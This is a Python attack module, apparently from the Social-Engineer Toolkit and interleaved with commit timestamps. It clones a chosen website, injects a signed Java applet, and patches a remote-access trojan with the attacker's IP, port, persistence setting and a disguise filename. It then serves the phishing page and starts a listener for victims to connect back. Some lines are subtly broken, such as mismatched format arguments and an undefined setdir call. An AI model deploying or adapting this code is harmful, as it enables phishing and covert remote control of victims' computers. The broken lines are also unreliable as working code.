2012-12-31 22:11:37 +00:00
#!/usr/bin/env python
#
# These are required fields
#
import sys
import subprocess
import os
from src . core . menu import text
from src . core import setcore as core
from time import sleep
import urlparse
definepath = os . getcwd ( )
2013-04-15 14:26:00 +00:00
setdir = setdir ( )
2012-12-31 22:11:37 +00:00
MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first "
#This is RATTE (Remote Administration Tool Tommy Edition) attack module. It will launch a java applet attack to inject RATTE. Then it will launch RATTE-Server and wait for victim to connect. RATTE can beat local Firewalls, IDS and even EAL 4+ certified network firewalls.
#This release one is only for education!"
AUTHOR = " Thomas Werth "
httpd = None
#
# This will start a web server in the directory root you specify, so for example
# you clone a website then run it in that web server, it will pull any index.html file
#
def start_web_server_tw ( directory , port ) :
2013-03-16 19:47:25 +00:00
global httpd
try :
# import the threading, socketserver, and simplehttpserver
import thread , SocketServer , SimpleHTTPServer
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind to port
class ReusableTCPServer ( SocketServer . TCPServer ) : allow_reuse_address = True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer ( ( " 0.0.0.0 " , port ) , SimpleHTTPServer . SimpleHTTPRequestHandler )
# thread this mofo
thread . start_new_thread ( httpd . serve_forever , ( ) )
# change directory to the path we specify for output path
os . chdir ( directory )
# handle keyboard interrupts
except KeyboardInterrupt :
core . print_info ( " Exiting the SET web server... " )
httpd . socket . close ( )
# handle the rest
#except Exception:
# print "[*] Exiting the SET web server...\n"
# httpd.socket.close()
2012-12-31 22:11:37 +00:00
def stop_web_server_tw ( ) :
2013-03-16 19:47:25 +00:00
global httpd
try :
httpd . socket . close ( )
# handle the exception
except Exception :
httpd . socket . close ( )
2012-12-31 22:11:37 +00:00
#
# This will create the java applet attack from start to finish.
# Includes payload (reverse_meterpreter for now) cloning website
# and additional capabilities.
#
def java_applet_attack_tw ( website , port , directory , ipaddr ) :
2013-03-16 19:47:25 +00:00
# clone the website and inject java applet
core . site_cloner ( website , directory , " java " )
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
############################################
# use customized Ratte nehmen
############################################
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
# this part is needed to rename the msf.exe file to a randomly generated one
2013-04-15 14:26:00 +00:00
if os . path . isfile ( " %s /rand_gen " % ( setdir ) ) :
2013-03-16 19:47:25 +00:00
# open the file
2013-04-15 14:26:00 +00:00
fileopen = file ( " %s /rand_gen " % ( setdir ) , " r " )
2013-03-16 19:47:25 +00:00
# start a loop
for line in fileopen :
# define executable name and rename it
filename = line . rstrip ( )
# move the file to the specified directory and filename
2013-04-15 14:26:00 +00:00
subprocess . Popen ( " cp src/payloads/ratte/ratte.binary %s / %s 1> /dev/null 2> /dev/null " % ( directory , filename ) , shell = True ) . wait ( )
2013-03-16 19:47:25 +00:00
# lastly we need to copy over the signed applet
2013-04-15 14:26:00 +00:00
subprocess . Popen ( " cp %s /Signed_Update.jar %s 1> /dev/null 2> /dev/null " % ( setdir , directory ) , shell = True ) . wait ( )
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
#TODO index.html parsen und IPADDR:Port ersetzen
fileopen = open ( " %s /index.html " % ( directory ) , " rb " )
data = fileopen . read ( )
fileopen . close ( )
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
filewrite = open ( " %s /index.html " % ( directory ) , " wb " )
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
toReplace = core . grab_ipaddress ( ) + " :80 "
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
#replace 3 times
filewrite . write ( data . replace ( str ( toReplace ) , ipaddr + " : " + str ( port ) , 3 ) )
filewrite . close ( )
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
# start the web server by running it in the background
start_web_server_tw ( directory , port )
2012-12-31 22:11:37 +00:00
#
# Start ratteserver
#
def ratte_listener_start ( port ) :
2013-03-16 19:47:25 +00:00
# launch ratteserver using ../ cause of reports/ subdir
#subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()
subprocess . Popen ( " ../src/payloads/ratte/ratteserver %d " % ( port ) , shell = True ) . wait ( )
2012-12-31 22:11:37 +00:00
def prepare_ratte ( ipaddr , ratteport , persistent , customexe ) :
2013-03-16 19:47:25 +00:00
core . print_status ( " preparing RATTE... " )
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen = open ( " src/payloads/ratte/ratte.binary " , " rb " )
data = fileopen . read ( )
fileopen . close ( )
############
#PATCH Server IP into RATTE
############
2013-04-15 14:26:00 +00:00
filewrite = open ( " %s /ratteM.exe " % ( setdir ) , " wb " )
2013-03-16 19:47:25 +00:00
host = int ( len ( ipaddr ) + 1 ) * " X "
rPort = int ( len ( str ( ratteport ) ) + 1 ) * " Y "
pers = int ( len ( str ( persistent ) ) + 1 ) * " Z "
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len ( str ( customexe ) ) > 0 :
cexe = int ( len ( str ( customexe ) ) + 1 ) * " Q "
else :
cexe = " "
filewrite . write ( data . replace ( str ( cexe ) , customexe + " \x00 " , 1 ) . replace ( str ( pers ) , persistent + " \x00 " , 1 ) . replace ( str ( host ) , ipaddr + " \x00 " , 1 ) . replace ( str ( rPort ) , str ( ratteport ) + " \x00 " , 1 ) )
filewrite . close ( )
2012-12-31 22:11:37 +00:00
# def main(): header is required
def main ( ) :
2013-03-16 19:47:25 +00:00
valid_site = False
valid_ip = False
valid_persistence = False
input_counter = 0
site_input_counter = 0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3 :
website = raw_input ( core . setprompt ( [ " 9 " , " 2 " ] , " Enter website to clone (ex. https://gmail.com) " ) )
site = urlparse . urlparse ( website )
if site . scheme == " http " or site . scheme == " https " :
if site . netloc != " " :
valid_site = True
else :
if site_input_counter == 2 :
core . print_error ( " \n Maybe you have the address written down wrong? " + core . bcolors . ENDC )
sleep ( 4 )
return
2012-12-31 22:11:37 +00:00
else :
2013-03-16 19:47:25 +00:00
core . print_warning ( " I can ' t determine the fqdn or IP of the site. Try again? " )
site_input_counter + = 1
else :
if site_input_counter == 2 :
core . print_error ( " \n Maybe you have the address written down wrong? " )
sleep ( 4 )
return
else :
core . print_warning ( " I couldn ' t determine whether this is an http or https site. Try again? " )
site_input_counter + = 1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3 :
ipaddr = raw_input ( core . setprompt ( [ " 9 " , " 2 " ] , " Enter the IP address to connect back on " ) )
valid_ip = core . validate_ip ( ipaddr )
if not valid_ip :
if input_counter == 2 :
core . print_error ( " \n Maybe you have the address written down wrong? " )
sleep ( 4 )
return
else :
input_counter + = 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try :
javaport = int ( raw_input ( core . setprompt ( [ " 9 " , " 2 " ] , " Port Java applet should listen on [80] " ) ) )
while javaport == 0 or javaport > 65535 :
if javaport == 0 :
core . print_warning ( text . PORT_NOT_ZERO )
if javaport > 65535 :
core . print_warning ( text . PORT_TOO_HIGH )
javaport = int ( raw_input ( core . setprompt ( [ " 9 " , " 2 " ] , " Port Java applet should listen on [80] " ) ) )
except ValueError :
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try :
ratteport = int ( raw_input ( core . setprompt ( [ " 9 " , " 2 " ] , " Port RATTE Server should listen on [8080] " ) ) )
while ratteport == javaport or ratteport == 0 or ratteport > 65535 :
if ratteport == javaport :
core . print_warning ( " Port must not be equal to javaport! " )
if ratteport == 0 :
core . print_warning ( text . PORT_NOT_ZERO )
if ratteport > 65535 :
core . print_warning ( text . PORT_TOO_HIGH )
ratteport = int ( raw_input ( core . setprompt ( [ " 9 " , " 2 " ] , " Port RATTE Server should listen on [8080] " ) ) )
except ValueError :
ratteport = 8080
persistent = core . yesno_prompt ( [ " 9 " , " 2 " ] , " Should RATTE be persistentententent [no|yes]? " )
# j0fer 06-27-2012 # while valid_persistence != True:
2012-12-31 22:11:37 +00:00
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
2013-03-16 19:47:25 +00:00
customexe = raw_input ( core . setprompt ( [ " 9 " , " 2 " ] , " Use specifix filename (ex. firefox.exe) [filename.exe or empty]? " ) )
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
#######################################
# prepare RATTE
#######################################
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
prepare_ratte ( ipaddr , ratteport , persistent , customexe )
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
######################################
# Java Applet Attack to deploy RATTE
#######################################
2012-12-31 22:11:37 +00:00
2013-03-16 19:47:25 +00:00
core . print_info ( " Starting java applet attack... " )
java_applet_attack_tw ( website , javaport , " reports/ " , ipaddr )
2012-12-31 22:11:37 +00:00
2013-04-15 14:26:00 +00:00
fileopen = file ( " %s /rand_gen " % ( setdir , definepath ) , " r " )
2013-03-16 19:47:25 +00:00
for line in fileopen :
ratte_random = line . rstrip ( )
2013-04-15 14:26:00 +00:00
subprocess . Popen ( " cp %s /ratteM.exe %s /reports/ %s " % ( setdir , definepath , definepath , ratte_random ) , shell = True ) . wait ( )
2013-03-16 19:47:25 +00:00
#######################
# start ratteserver
#######################
core . print_info ( " Starting ratteserver... " )
ratte_listener_start ( ratteport )
######################
# stop webserver
######################
stop_web_server_tw ( )
return